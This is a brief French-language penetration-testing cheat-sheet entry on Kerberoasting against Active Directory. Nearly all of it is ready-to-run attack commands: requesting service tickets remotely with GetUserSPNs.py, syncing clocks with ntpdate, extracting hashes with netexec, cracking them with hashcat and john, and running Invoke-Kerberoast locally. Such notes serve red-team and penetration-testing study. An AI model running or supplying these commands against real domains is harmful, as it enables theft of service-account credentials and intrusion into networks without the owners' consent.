Kerberoast

À distance

GetUserSPNs.py -request -dc-ip <dc ip> <domain>/<user> -save -outputfile kerberoast.txt
Tip

Si l’erreur suivante apparait [-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great), c’est que la cible et l’attaquant ne partage pas le même temps. Il est donc nécessaire de les synchroniser à l’aide de ntpdate <dc ip>.

Une fois les jetons kerberoastable récupérés, il est possible d’utiliser netexec afin de récupérer les hashes des jetons récupérés.

nxc ldap <dc_ip> -u '<user>' -p '<password>' --kerberoasting  kerberoastable.txt

Il est ensuite possible de cracker les hashes avec john ou hashcat:

hashcat -m 13100 kerberoast.txt $wordlist
john --format=krb5tgs --wordlist=$wordlist kerberoast.txt

En local

Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast
john --format=krb5tgs /tmp/tocrack